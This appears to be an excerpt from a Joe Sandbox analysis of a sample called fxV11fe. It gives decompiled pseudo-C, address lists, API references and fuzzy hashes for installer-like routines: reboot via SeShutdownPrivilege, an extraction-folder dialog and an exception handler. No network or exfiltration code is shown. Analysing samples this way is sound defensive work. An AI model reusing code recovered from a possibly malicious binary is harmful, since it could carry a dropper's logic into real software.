                                                                                                                                                                                                                                            0x00a05eed
                                                                                                                                                                                                                                            0x00a05f3f
                                                                                                                                                                                                                                            0x00a05f40
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05eef
                                                                                                                                                                                                                                            0x00a05eef
                                                                                                                                                                                                                                            0x00a05ef2
                                                                                                                                                                                                                                            0x00a05f34
                                                                                                                                                                                                                                            0x00a05ef4
                                                                                                                                                                                                                                            0x00a05ef4
                                                                                                                                                                                                                                            0x00a05ef7
                                                                                                                                                                                                                                            0x00a05f2b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05ef9
                                                                                                                                                                                                                                            0x00a05ef9
                                                                                                                                                                                                                                            0x00a05efc
                                                                                                                                                                                                                                            0x00a05f22
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05efe
                                                                                                                                                                                                                                            0x00a05eff
                                                                                                                                                                                                                                            0x00a05f02
                                                                                                                                                                                                                                            0x00a05f16
                                                                                                                                                                                                                                            0x00a05f04
                                                                                                                                                                                                                                            0x00a05f07
                                                                                                                                                                                                                                            0x00a05f0d
                                                                                                                                                                                                                                            0x00a05f46
                                                                                                                                                                                                                                            0x00a05f46
                                                                                                                                                                                                                                            0x00a05f09
                                                                                                                                                                                                                                            0x00a05f09
                                                                                                                                                                                                                                            0x00a05f09
                                                                                                                                                                                                                                            0x00a05f07
                                                                                                                                                                                                                                            0x00a05f02
                                                                                                                                                                                                                                            0x00a05efc
                                                                                                                                                                                                                                            0x00a05ef7
                                                                                                                                                                                                                                            0x00a05ef2
                                                                                                                                                                                                                                            0x00a05f4c
                                                                                                                                                                                                                                            0x00a05f4e
                                                                                                                                                                                                                                            0x00a05f50
                                                                                                                                                                                                                                            0x00a05f54
                                                                                                                                                                                                                                            0x00a05ed4
                                                                                                                                                                                                                                            0x00a05ea2
                                                                                                                                                                                                                                            0x00a05ea4
                                                                                                                                                                                                                                            0x00a05eaf
                                                                                                                                                                                                                                            0x00a05eaf
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05e79
                                                                                                                                                                                                                                            0x00a05e7d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05e83
                                                                                                                                                                                                                                            0x00a05e83
                                                                                                                                                                                                                                            0x00a05e83
                                                                                                                                                                                                                                            0x00a05e85
                                                                                                                                                                                                                                            0x00a05e85
                                                                                                                                                                                                                                            0x00a05e8e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05e94
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05e94
                                                                                                                                                                                                                                            0x00a05e8e
                                                                                                                                                                                                                                            0x00a05e7d
                                                                                                                                                                                                                                            0x00a05e77
                                                                                                                                                                                                                                            0x00a05e6e
                                                                                                                                                                                                                                            0x00a05e65
                                                                                                                                                                                                                                            0x00a05e5c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05dd0
                                                                                                                                                                                                                                            0x00a05dd0
                                                                                                                                                                                                                                            0x00a05dd0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05dd0
                                                                                                                                                                                                                                            0x00a05dce
                                                                                                                                                                                                                                            0x00a05dca
                                                                                                                                                                                                                                            0x00a05dba
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a05d00
                                                                                                                                                                                                                                            0x00a05dd9
                                                                                                                                                                                                                                            0x00a05e04
                                                                                                                                                                                                                                            0x00a061fe
                                                                                                                                                                                                                                            0x00a05e0a
                                                                                                                                                                                                                                            0x00a05e0c
                                                                                                                                                                                                                                            0x00a05e17
                                                                                                                                                                                                                                            0x00a05e17
                                                                                                                                                                                                                                            0x00a05e04
                                                                                                                                                                                                                                            0x00a06200
                                                                                                                                                                                                                                            0x00a06200
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CharNextA.USER32(?,00000000,?,?), ref: 00A05CEE
                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00A08B3E,00000104,00000000,?,?), ref: 00A05DFC
                                                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 00A05E3E
                                                                                                                                                                                                                                            • CharUpperA.USER32(-00000052), ref: 00A05EE1
                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00A05F6F
                                                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 00A05FA7
                                                                                                                                                                                                                                            • CharUpperA.USER32(-0000004E), ref: 00A06008
                                                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 00A060AA
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00A01140,00000000,00000040,00000000), ref: 00A061F1
                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00A061F8
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                                                            • String ID: "$"$:$RegServer
                                                                                                                                                                                                                                            • API String ID: 1203814774-25366791
                                                                                                                                                                                                                                            • Opcode ID: 787dcfd21c62dd52099e8bdef50b822d3227f23c7d7d7d92554d26f9a8774ffe
                                                                                                                                                                                                                                            • Instruction ID: 894d8dc36ade8a0caf689afa7ca51ee9049d132896e8a4e8b1078e3061bb3af1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 787dcfd21c62dd52099e8bdef50b822d3227f23c7d7d7d92554d26f9a8774ffe
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DAD13871E04A4D5AEF39CB78BC483FB3B61AB1A344F1441AAD4CAD61D1DA748E838F04
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 60%
                                                                                                                                                                                                                                            			E00A01F90(signed int __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				int _v12;
                                                                                                                                                                                                                                            				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                                                            				void* _v28;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				signed int _t13;
                                                                                                                                                                                                                                            				int _t21;
                                                                                                                                                                                                                                            				void* _t25;
                                                                                                                                                                                                                                            				int _t28;
                                                                                                                                                                                                                                            				signed char _t30;
                                                                                                                                                                                                                                            				void* _t38;
                                                                                                                                                                                                                                            				void* _t40;
                                                                                                                                                                                                                                            				void* _t41;
                                                                                                                                                                                                                                            				signed int _t46;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t41 = __esi;
                                                                                                                                                                                                                                            				_t38 = __edi;
                                                                                                                                                                                                                                            				_t30 = __ecx;
                                                                                                                                                                                                                                            				if((__ecx & 0x00000002) != 0) {
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					if((_t30 & 0x00000004) != 0) {
                                                                                                                                                                                                                                            						L14:
                                                                                                                                                                                                                                            						if( *0xa09a40 != 0) {
                                                                                                                                                                                                                                            							_pop(_t30);
                                                                                                                                                                                                                                            							_t44 = _t46;
                                                                                                                                                                                                                                            							_t13 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                                                            							_push(_t38);
                                                                                                                                                                                                                                            							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                                                                                                                                                                            								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                                                            								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                                                            								_v12 = 2;
                                                                                                                                                                                                                                            								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                                                            								CloseHandle(_v28);
                                                                                                                                                                                                                                            								_t41 = _t41;
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								if(_t21 != 0) {
                                                                                                                                                                                                                                            									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                                                            										_t25 = 1;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t37 = 0x4f7;
                                                                                                                                                                                                                                            										goto L3;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t37 = 0x4f6;
                                                                                                                                                                                                                                            									goto L4;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t37 = 0x4f5;
                                                                                                                                                                                                                                            								L3:
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								L4:
                                                                                                                                                                                                                                            								_push(0x10);
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								E00A044B9(0, _t37);
                                                                                                                                                                                                                                            								_t25 = 0;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_pop(_t40);
                                                                                                                                                                                                                                            							return E00A06CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t37 = 0x522;
                                                                                                                                                                                                                                            						_t28 = E00A044B9(0, 0x522, 0xa01140, 0, 0x40, 4);
                                                                                                                                                                                                                                            						if(_t28 != 6) {
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					__eax = E00A01EA7(__ecx);
                                                                                                                                                                                                                                            					if(__eax != 2) {
                                                                                                                                                                                                                                            						L16:
                                                                                                                                                                                                                                            						return _t28;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						goto L12;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}

















                                                                                                                                                                                                                                            0x00a01f90
                                                                                                                                                                                                                                            0x00a01f90
                                                                                                                                                                                                                                            0x00a01f93
                                                                                                                                                                                                                                            0x00a01f98
                                                                                                                                                                                                                                            0x00a01fa4
                                                                                                                                                                                                                                            0x00a01fa7
                                                                                                                                                                                                                                            0x00a01fc5
                                                                                                                                                                                                                                            0x00a01fcd
                                                                                                                                                                                                                                            0x00a01fdb
                                                                                                                                                                                                                                            0x00a01ee5
                                                                                                                                                                                                                                            0x00a01eea
                                                                                                                                                                                                                                            0x00a01ef1
                                                                                                                                                                                                                                            0x00a01ef4
                                                                                                                                                                                                                                            0x00a01f0c
                                                                                                                                                                                                                                            0x00a01f2e
                                                                                                                                                                                                                                            0x00a01f3a
                                                                                                                                                                                                                                            0x00a01f46
                                                                                                                                                                                                                                            0x00a01f4d
                                                                                                                                                                                                                                            0x00a01f58
                                                                                                                                                                                                                                            0x00a01f60
                                                                                                                                                                                                                                            0x00a01f61
                                                                                                                                                                                                                                            0x00a01f62
                                                                                                                                                                                                                                            0x00a01f75
                                                                                                                                                                                                                                            0x00a01f80
                                                                                                                                                                                                                                            0x00a01f77
                                                                                                                                                                                                                                            0x00a01f77
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a01f77
                                                                                                                                                                                                                                            0x00a01f64
                                                                                                                                                                                                                                            0x00a01f64
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a01f64
                                                                                                                                                                                                                                            0x00a01f0e
                                                                                                                                                                                                                                            0x00a01f0e
                                                                                                                                                                                                                                            0x00a01f13
                                                                                                                                                                                                                                            0x00a01f13
                                                                                                                                                                                                                                            0x00a01f14
                                                                                                                                                                                                                                            0x00a01f14
                                                                                                                                                                                                                                            0x00a01f16
                                                                                                                                                                                                                                            0x00a01f17
                                                                                                                                                                                                                                            0x00a01f1a
                                                                                                                                                                                                                                            0x00a01f1f
                                                                                                                                                                                                                                            0x00a01f1f
                                                                                                                                                                                                                                            0x00a01f86
                                                                                                                                                                                                                                            0x00a01f8f
                                                                                                                                                                                                                                            0x00a01fcf
                                                                                                                                                                                                                                            0x00a01fd3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a01fd3
                                                                                                                                                                                                                                            0x00a01fa9
                                                                                                                                                                                                                                            0x00a01fb4
                                                                                                                                                                                                                                            0x00a01fbb
                                                                                                                                                                                                                                            0x00a01fc3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a01fc3
                                                                                                                                                                                                                                            0x00a01f9a
                                                                                                                                                                                                                                            0x00a01f9a
                                                                                                                                                                                                                                            0x00a01fa2
                                                                                                                                                                                                                                            0x00a01fd9
                                                                                                                                                                                                                                            0x00a01fda
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a01fa2

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00A01EFB
                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00A01F02
                                                                                                                                                                                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 00A01FD3
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                                                            • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                            • API String ID: 2795981589-3733053543
                                                                                                                                                                                                                                            • Opcode ID: b33e180ebf39bcfbc20ac2729c6ef21f5608b96a7878343feb7f24cfb6682df3
                                                                                                                                                                                                                                            • Instruction ID: 9a524a7387f91190bb4c869e25664e2bffa62b442ff2546d5218fde089e9215e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b33e180ebf39bcfbc20ac2729c6ef21f5608b96a7878343feb7f24cfb6682df3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D621A3B1B4020E6BDB209BE1AC4AFFF76B8EB95B10F10051AFB02E61C1D77588039661
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A06CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                                                            				UnhandledExceptionFilter(_a4);
                                                                                                                                                                                                                                            				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                                                            			}



                                                                                                                                                                                                                                            0x00a06cf7
                                                                                                                                                                                                                                            0x00a06d00
                                                                                                                                                                                                                                            0x00a06d19

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00A06E26,00A01000), ref: 00A06CF7
                                                                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(00A06E26,?,00A06E26,00A01000), ref: 00A06D00
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(C0000409,?,00A06E26,00A01000), ref: 00A06D0B
                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,?,00A06E26,00A01000), ref: 00A06D12
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3231755760-0
                                                                                                                                                                                                                                            • Opcode ID: 2e1d8545e5bf5b0e751a2b9225e635919d5179a5e28eaa525618449f942e0236
                                                                                                                                                                                                                                            • Instruction ID: 5832c165fa3d834a0801eb6965fe6b7c5919aeddddd1112bdcfea06636e26335
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2e1d8545e5bf5b0e751a2b9225e635919d5179a5e28eaa525618449f942e0236
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7CD0C93200030CBBDB006BE1EC0CA593F28EB58312F444100F31982020CA3244538B52
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 76%
                                                                                                                                                                                                                                            			E00A03210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                            				void* _t10;
                                                                                                                                                                                                                                            				int _t20;
                                                                                                                                                                                                                                            				int _t21;
                                                                                                                                                                                                                                            				int _t23;
                                                                                                                                                                                                                                            				char _t24;
                                                                                                                                                                                                                                            				long _t25;
                                                                                                                                                                                                                                            				int _t27;
                                                                                                                                                                                                                                            				int _t30;
                                                                                                                                                                                                                                            				void* _t32;
                                                                                                                                                                                                                                            				int _t33;
                                                                                                                                                                                                                                            				int _t34;
                                                                                                                                                                                                                                            				int _t37;
                                                                                                                                                                                                                                            				int _t38;
                                                                                                                                                                                                                                            				int _t39;
                                                                                                                                                                                                                                            				void* _t42;
                                                                                                                                                                                                                                            				void* _t46;
                                                                                                                                                                                                                                            				CHAR* _t49;
                                                                                                                                                                                                                                            				void* _t58;
                                                                                                                                                                                                                                            				void* _t63;
                                                                                                                                                                                                                                            				struct HWND__* _t64;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t64 = _a4;
                                                                                                                                                                                                                                            				_t6 = _a8 - 0x10;
                                                                                                                                                                                                                                            				if(_t6 == 0) {
                                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                                            					L38:
                                                                                                                                                                                                                                            					EndDialog(_t64, ??);
                                                                                                                                                                                                                                            					L39:
                                                                                                                                                                                                                                            					__eflags = 1;
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t42 = 1;
                                                                                                                                                                                                                                            				_t10 = _t6 - 0x100;
                                                                                                                                                                                                                                            				if(_t10 == 0) {
                                                                                                                                                                                                                                            					E00A043D0(_t64, GetDesktopWindow());
                                                                                                                                                                                                                                            					SetWindowTextA(_t64, "lenta");
                                                                                                                                                                                                                                            					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                                                                                                                                                                                            					__eflags =  *0xa09a40 - _t42; // 0x3
                                                                                                                                                                                                                                            					if(__eflags == 0) {
                                                                                                                                                                                                                                            						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L36:
                                                                                                                                                                                                                                            					return _t42;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t10 == _t42) {
                                                                                                                                                                                                                                            					_t20 = _a12 - 1;
                                                                                                                                                                                                                                            					__eflags = _t20;
                                                                                                                                                                                                                                            					if(_t20 == 0) {
                                                                                                                                                                                                                                            						_t21 = GetDlgItemTextA(_t64, 0x835, 0xa091e4, 0x104);
                                                                                                                                                                                                                                            						__eflags = _t21;
                                                                                                                                                                                                                                            						if(_t21 == 0) {
                                                                                                                                                                                                                                            							L32:
                                                                                                                                                                                                                                            							_t58 = 0x4bf;
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            							_push(0x10);
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            							L25:
                                                                                                                                                                                                                                            							E00A044B9(_t64, _t58);
                                                                                                                                                                                                                                            							goto L39;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t49 = 0xa091e4;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t23 =  *_t49;
                                                                                                                                                                                                                                            							_t49 =  &(_t49[1]);
                                                                                                                                                                                                                                            							__eflags = _t23;
                                                                                                                                                                                                                                            						} while (_t23 != 0);
                                                                                                                                                                                                                                            						__eflags = _t49 - 0xa091e5 - 3;
                                                                                                                                                                                                                                            						if(_t49 - 0xa091e5 < 3) {
                                                                                                                                                                                                                                            							goto L32;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t24 =  *0xa091e5; // 0x3a
                                                                                                                                                                                                                                            						__eflags = _t24 - 0x3a;
                                                                                                                                                                                                                                            						if(_t24 == 0x3a) {
                                                                                                                                                                                                                                            							L21:
                                                                                                                                                                                                                                            							_t25 = GetFileAttributesA(0xa091e4);
                                                                                                                                                                                                                                            							__eflags = _t25 - 0xffffffff;
                                                                                                                                                                                                                                            							if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                            								L26:
                                                                                                                                                                                                                                            								E00A0658A(0xa091e4, 0x104, 0xa01140);
                                                                                                                                                                                                                                            								_t27 = E00A058C8(0xa091e4);
                                                                                                                                                                                                                                            								__eflags = _t27;
                                                                                                                                                                                                                                            								if(_t27 != 0) {
                                                                                                                                                                                                                                            									__eflags =  *0xa091e4 - 0x5c;
                                                                                                                                                                                                                                            									if( *0xa091e4 != 0x5c) {
                                                                                                                                                                                                                                            										L30:
                                                                                                                                                                                                                                            										_t30 = E00A0597D(0xa091e4, 1, _t64, 1);
                                                                                                                                                                                                                                            										__eflags = _t30;
                                                                                                                                                                                                                                            										if(_t30 == 0) {
                                                                                                                                                                                                                                            											L35:
                                                                                                                                                                                                                                            											_t42 = 1;
                                                                                                                                                                                                                                            											__eflags = 1;
                                                                                                                                                                                                                                            											goto L36;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										L31:
                                                                                                                                                                                                                                            										_t42 = 1;
                                                                                                                                                                                                                                            										EndDialog(_t64, 1);
                                                                                                                                                                                                                                            										goto L36;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									__eflags =  *0xa091e5 - 0x5c;
                                                                                                                                                                                                                                            									if( *0xa091e5 == 0x5c) {
                                                                                                                                                                                                                                            										goto L31;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									goto L30;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_push(0x10);
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_t58 = 0x4be;
                                                                                                                                                                                                                                            								goto L25;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t32 = E00A044B9(_t64, 0x54a, 0xa091e4, 0, 0x20, 4);
                                                                                                                                                                                                                                            							__eflags = _t32 - 6;
                                                                                                                                                                                                                                            							if(_t32 != 6) {
                                                                                                                                                                                                                                            								goto L35;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t33 = CreateDirectoryA(0xa091e4, 0);
                                                                                                                                                                                                                                            							__eflags = _t33;
                                                                                                                                                                                                                                            							if(_t33 != 0) {
                                                                                                                                                                                                                                            								goto L26;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            							_push(0x10);
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            							_push(0xa091e4);
                                                                                                                                                                                                                                            							_t58 = 0x4cb;
                                                                                                                                                                                                                                            							goto L25;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags =  *0xa091e4 - 0x5c;
                                                                                                                                                                                                                                            						if( *0xa091e4 != 0x5c) {
                                                                                                                                                                                                                                            							goto L32;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						__eflags = _t24 - 0x5c;
                                                                                                                                                                                                                                            						if(_t24 != 0x5c) {
                                                                                                                                                                                                                                            							goto L32;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						goto L21;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t34 = _t20 - 1;
                                                                                                                                                                                                                                            					__eflags = _t34;
                                                                                                                                                                                                                                            					if(_t34 == 0) {
                                                                                                                                                                                                                                            						EndDialog(_t64, 0);
                                                                                                                                                                                                                                            						 *0xa09124 = 0x800704c7;
                                                                                                                                                                                                                                            						goto L39;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__eflags = _t34 != 0x834;
                                                                                                                                                                                                                                            					if(_t34 != 0x834) {
                                                                                                                                                                                                                                            						goto L36;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t37 = LoadStringA( *0xa09a3c, 0x3e8, 0xa08598, 0x200);
                                                                                                                                                                                                                                            					__eflags = _t37;
                                                                                                                                                                                                                                            					if(_t37 != 0) {
                                                                                                                                                                                                                                            						_t38 = E00A04224(_t64, _t46, _t46);
                                                                                                                                                                                                                                            						__eflags = _t38;
                                                                                                                                                                                                                                            						if(_t38 == 0) {
                                                                                                                                                                                                                                            							goto L36;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t39 = SetDlgItemTextA(_t64, 0x835, 0xa087a0);
                                                                                                                                                                                                                                            						__eflags = _t39;
                                                                                                                                                                                                                                            						if(_t39 != 0) {
                                                                                                                                                                                                                                            							goto L36;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t63 = 0x4c0;
                                                                                                                                                                                                                                            						L9:
                                                                                                                                                                                                                                            						E00A044B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						_push(0);
                                                                                                                                                                                                                                            						goto L38;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t63 = 0x4b1;
                                                                                                                                                                                                                                            					goto L9;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}

























                                                                                                                                                                                                                                            0x00a0321b
                                                                                                                                                                                                                                            0x00a0321e
                                                                                                                                                                                                                                            0x00a03221
                                                                                                                                                                                                                                            0x00a0343c
                                                                                                                                                                                                                                            0x00a0343e
                                                                                                                                                                                                                                            0x00a0343f
                                                                                                                                                                                                                                            0x00a03445
                                                                                                                                                                                                                                            0x00a03447
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03447
                                                                                                                                                                                                                                            0x00a03229
                                                                                                                                                                                                                                            0x00a0322a
                                                                                                                                                                                                                                            0x00a0322f
                                                                                                                                                                                                                                            0x00a033ec
                                                                                                                                                                                                                                            0x00a033f7
                                                                                                                                                                                                                                            0x00a03410
                                                                                                                                                                                                                                            0x00a03416
                                                                                                                                                                                                                                            0x00a0341d
